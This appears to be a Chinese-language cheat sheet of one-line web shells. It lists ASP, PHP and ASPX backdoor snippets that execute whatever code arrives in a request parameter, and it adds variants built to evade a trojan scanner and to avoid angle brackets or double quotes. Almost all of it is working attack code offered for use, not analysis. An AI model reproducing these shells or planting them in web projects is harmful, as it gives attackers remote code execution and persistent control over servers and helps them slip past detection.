asp一句话

<%execute(request("1"))%>

php一句话

<?php eval($_POST[1]);?>

aspx一句话

<script language="C#" runat="server">

WebAdmin2Y.x.y aaaaa = new WebAdmin2Y.x.y("add6bb58e139be10");

</script>

可以躲过雷客图的一句话。

<%

set ms = server.CreateObject("MSScriptControl.ScriptControl.1")

ms.Language="VBScript"

ms.AddObject "Response", Response

ms.AddObject "request", request

ms.ExecuteStatement("ev"&"al(request(""1""))")

%>

不用'<,>'的asp一句话

<script language=VBScript runat=server>execute request("1")</script>

不用双引号的一句话。

<%eval request(chr(35))%>